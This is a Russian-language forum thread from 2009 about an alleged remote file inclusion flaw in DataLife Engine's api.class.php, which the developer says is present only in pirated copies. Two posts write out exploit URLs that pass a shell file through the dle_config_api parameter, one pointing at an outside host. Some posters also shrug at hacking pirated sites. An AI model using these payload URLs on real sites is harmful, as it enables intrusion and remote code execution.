КиберБулка 2 Опубликовано: 2 сентября 2009 Рассказать Опубликовано: 2 сентября 2009 (изменено) Воть http://www.site.ru/engine/api/api.class.php?dle_config_api=[shell.txt?] Изменено 2 сентября 2009 пользователем КиберБулка Цитата Ссылка на сообщение Поделиться на других сайтах
IT-Security 33 Опубликовано: 2 сентября 2009 Рассказать Опубликовано: 2 сентября 2009 (изменено) И что?В чём баг то? API если его вызвать выдаёт всегда белый лист. Какой нафиг текст шелла?Вы о чём вообще? Изменено 2 сентября 2009 пользователем IT-Security Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 072 Опубликовано: 2 сентября 2009 Рассказать Опубликовано: 2 сентября 2009 Что то я также не понял, и причем здесь переменная dle_config_api, ее вообще нет в этом файле.Ха, увидел где используется dle_config_api, в нелегальных копиях скрипта, ну и ладно нехай их ломают, если подобная уязвимость есть, я даже тестировать ее не буду. Все легальные пользователи могут спать спокойно, у них ничего подобного нет. 3 Цитата Ссылка на сообщение Поделиться на других сайтах
rainbowsix 0 Опубликовано: 8 сентября 2009 Рассказать Опубликовано: 8 сентября 2009 Радует, что всё норм)) Цитата Ссылка на сообщение Поделиться на других сайтах
eph1r 0 Опубликовано: 8 сентября 2009 Рассказать Опубликовано: 8 сентября 2009 нашел парочку таких :-D удивлены, наверное Цитата Ссылка на сообщение Поделиться на других сайтах
Captain 623 Опубликовано: 9 сентября 2009 Рассказать Опубликовано: 9 сентября 2009 (изменено) нашел парочку таких :-D удивлены, наверное Толк, то есть? Заняться нечем? Изменено 9 сентября 2009 пользователем Captain Цитата Ссылка на сообщение Поделиться на других сайтах
BrillianMedia 8 Опубликовано: 9 сентября 2009 Рассказать Опубликовано: 9 сентября 2009 (изменено) delete Изменено 9 сентября 2009 пользователем BrillianMedia Цитата Ссылка на сообщение Поделиться на других сайтах
IT-Security 33 Опубликовано: 9 сентября 2009 Рассказать Опубликовано: 9 сентября 2009 Да нет, почему. Если человек целенаправлено ставит себе пиратскую версию - почему бы и не наказать?Какая разница, что писать абузу провайдеру, что написать посередине сайта "Купи лицензию!". Цитата Ссылка на сообщение Поделиться на других сайтах
Al-x 7 Опубликовано: 9 сентября 2009 Рассказать Опубликовано: 9 сентября 2009 Да нет, почему. Если человек целенаправлено ставит себе пиратскую версию - почему бы и не наказать?Какая разница, что писать абузу провайдеру, что написать посередине сайта "Купи лицензию!". Тогда этим должны заниматься уполномоченые люди, а не пираты. В данном случае Целсофт должен сделать официальное заявление, что мол пиратки будем целенаправлено ломать. Да и то, я не уверен, что это законно... очень-очень врядли такое законно, уже не говоря о принципах разработчика. А в данному случае получается "узаконивание" "Щас покажу какой я крутой хакер" Цитата Ссылка на сообщение Поделиться на других сайтах
celsoft 6 072 Опубликовано: 9 сентября 2009 Рассказать Опубликовано: 9 сентября 2009 В данном случае Целсофт должен сделать официальное заявление, что мол пиратки будем целенаправлено ломать. Зачем, я позиционирую себя гораздо выше и не собираюсь опускаться до подобных вещей. Иногда мне даже сами доступ дают, просять решить какую либо проблему, а выясняется что у человека нелегальная копия, и тем не менее я не считаю что имею право тут же удалять содержимое сайта. Я в таких случаях лишь информирую, не трогая содержимое. Но это официальная позиция. Неофициальная позиция такая что я не осуждаю тех кто например воспользуется данной уязвимостью и взломает нелегальный софт, если человек использующий ворованный скрипт, считает себя правым нарушать чужие права, то он также должен осознавать что значит такое же право имеют и другие люди, которые могут нарушить его права (эффект бумеранга). Другими словами, к людям нужно относиться так, как ты хочешь чтобы они к тебе относились. Если человек пренебрежительно относится к другим, то он должен быть также готов, что точно также обойдутся когда-нибудь и с ним. Цитата Ссылка на сообщение Поделиться на других сайтах
Al-x 7 Опубликовано: 9 сентября 2009 Рассказать Опубликовано: 9 сентября 2009 (изменено) Да, именно поэтому я и добавил уже не говоря о принципах разработчика Неофициальная позиция такая что я не осуждаю тех кто например воспользуется данной уязвимостью и взломает нелегальный софт главное, чтобы эту фразу не расценили как "ломайте господа". Т.е. подмена понятий "не осуждаю" с "наказать" Вы то как разработчик имеете права "наказывать"... Изменено 9 сентября 2009 пользователем Al-x Цитата Ссылка на сообщение Поделиться на других сайтах
demon165 8 Опубликовано: 29 сентября 2009 Рассказать Опубликовано: 29 сентября 2009 уязвимость существует для лицензии тоже,вызов идёт:/%20%20//engine/api/api.class.php?dle_config_api=http://www.koreadefence.net/data/shirohige/zfxid.txt? тоесть не нужно даже в корень пихать,вызов будет сделан через удалённый,у моего друга 8.0 лицензия,вчера взломали так,и всё тянеться к корейским сайтам Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 29 сентября 2009 Рассказать Опубликовано: 29 сентября 2009 Жесть, ппц Удалил у себя вообще папку api Цитата Ссылка на сообщение Поделиться на других сайтах
pleomax 5 Опубликовано: 29 сентября 2009 Рассказать Опубликовано: 29 сентября 2009 А у тебя нелегальная копия? Цитата Ссылка на сообщение Поделиться на других сайтах
WWW.ZEOS.IN 1 161 Опубликовано: 29 сентября 2009 Рассказать Опубликовано: 29 сентября 2009 Лицензия Цитата Ссылка на сообщение Поделиться на других сайтах
IT-Security 33 Опубликовано: 3 октября 2009 Рассказать Опубликовано: 3 октября 2009 Для слепых повторяю - в ЛИЦЕНЗИОННОЙ ВЕРСИИ DLE этого бага НЕТ! И не нужно гнать, что у Вашего друга/бабушки/тёти стоит лицензия и его сломали. Этот файл писал ЛИЧНО Я и никаких параметров туда не ставил!API не работает через метод GET! Цитата Ссылка на сообщение Поделиться на других сайтах
Рекомендованные сообщения
Присоединяйтесь к обсуждению
Вы можете опубликовать сообщение сейчас, а зарегистрироваться позже. Если у вас есть аккаунт, войдите в него для написания от своего имени.